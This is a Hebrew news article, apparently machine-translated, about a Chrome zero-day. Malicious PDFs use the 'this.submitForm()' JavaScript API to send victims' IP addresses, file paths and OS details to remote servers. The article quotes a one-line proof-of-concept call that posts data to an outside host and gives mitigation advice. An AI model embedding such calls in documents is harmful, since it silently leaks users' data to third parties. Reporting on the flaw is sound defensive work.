פגיעות Chrome מאפשרת להאקרים לאסוף נתוני משתמשים באמצעות קבצי PDF
תוכן עניינים:
וִידֵאוֹ: GOOGLE TIPS: HOW TO DISABLE PDF VIEWER IN GOOGLE CHROME 2024
שירות גילוי לנצל EdgeSpot גילה פגיעות מסקרנת של Chrome באפס יום תוך ניצול מסמכי PDF. הפגיעות מאפשרת לתוקפים לקצור נתונים רגישים באמצעות מסמכי PDF זדוניים שנפתחו ב- Chrome.
ברגע שהקורבן פותח את קבצי ה- PDF המתאימים ב- Google Chrome, תוכנית זדונית מתחילה לעבוד ברקע על ידי איסוף נתוני משתמש.
לאחר מכן הנתונים מועברים לשרת המרוחק שבשליטת האקרים. יתכן שאתה תוהה אילו נתונים נשאבים על ידי התוקפים, הם מכוונים לנתונים הבאים במחשב האישי שלך:
- כתובת ה - IP
- הנתיב המלא של קובץ ה- PDF במערכת
- גרסאות מערכת הפעלה וכרום
היזהר מקבצי PDF עם תוכנות זדוניות
אתה עשוי להיות מופתע לדעת ששום דבר לא קורה כאשר Adobe Reader משמש לפתיחת קבצי PDF. בנוסף, בקשות HTTP POST משמשות להעברת נתונים לשרתים המרוחקים ללא כל התערבות של משתמשים.
מומחים הבחינו כי אחד משני התחומים readnotifycom או burpcollaboratornet מקבל את הנתונים.
תוכלו לדמיין את עוצמת ההתקפה על ידי התחשבות בעובדה שרוב תוכנת האנטי-וירוס אינה מסוגלת לאתר את הדגימות שאותרו על ידי EdgeSpot.
מומחים חושפים כי התוקפים משתמשים בממשק ה- API "this.submitForm ()" ל- Javascript PDF כדי לאסוף את המידע הרגיש של המשתמשים.
בדקנו אותו באמצעות PoC מינימלי, קריאת API פשוטה כמו "this.submitForm ('http://google.com/test')" תגרום ל- Google Chrome לשלוח את הנתונים האישיים אל google.com.
המומחים למעשה גילו כי באג Chrome זה מנוצל על ידי שתי קבוצות מובחנות של קבצי PDF זדוניים. שניהם הופצו באוקטובר 2017 וספטמבר 2018, בהתאמה.
ראוי לציין כי הנתונים שנאספו יכולים לשמש את התוקפים כדי לכוונן התקפות בעתיד. מהדיווחים עולה כי קבוצת הקבצים הראשונה נערכה באמצעות שירות המעקב PDF של ReadNotify.
משתמשים יכולים להשתמש בשירות כדי לעקוב אחר תצוגות המשתמשים. EdgeSpot לא שיתפה שום פרטים לגבי אופי המערכה השנייה של קבצי PDF.
כיצד להישאר מוגנים
שירות גילוי Exploit EdgeSpot רצה להתריע בפני המשתמשים במשתמשי Chrome על הסיכונים הפוטנציאליים מכיוון שהתיקון לא צפוי להשתחרר בזמן הקרוב.
EdgeSpot דיווחה לגוגל על הפגיעות בשנה שעברה והחברה הבטיחה לשחרר תיקון בסוף אפריל. ח
כמובן, אתה יכול לשקול להשתמש בפתרון זמני לבעיה על ידי צפייה מקומית במסמכי PDF שהתקבלו באמצעות אפליקציה חלופית לקורא PDF.
לחלופין, אתה יכול גם לפתוח את מסמכי ה- PDF שלך ב- Chrome על ידי ניתוק המערכות שלך מהאינטרנט. בינתיים תוכלו להמתין לעדכון Chrome 74 שצפוי לצאת לדרך ב- 23 באפריל.
Firefox של Mozilla רוצה לאסוף את נתוני הגלישה שלך ל'מחקר '.
מוזילה פיירפוקס מגלה את הרעיון של איסוף נתוני גלישה פרטיים בכדי לסייע במחקר. החברה מבטיחה שזו תהיה אופציה לאופציונאלית.
פגיעות של שרת החליפין מעניקה להאקרים הרשאות מנהל
פגיעות חדשה נמצאה ב- Microsoft Exchange Server 2013, 2016 ו- 2019. פגיעות חדשה זו נקראת PrivExchange.
פגיעות של Outlook מאפשרת להאקרים לגנוב hash סיסמאות
Microsoft Outlook היא אחת מפלטפורמות הדוא"ל הפופולריות ביותר בעולם. אני באופן אישי סומך על כתובת הדוא"ל שלי ב- Outlook עבור משימות הקשורות לעבודה כמו גם לעבודות אישיות. למרבה הצער, Outlook עשוי לא להיות בטוח כמו שאנחנו משתמשים רוצים לחשוב. על פי דו"ח שפרסם המכון להנדסת תוכנה לקרנגי מלון, Outlook ...
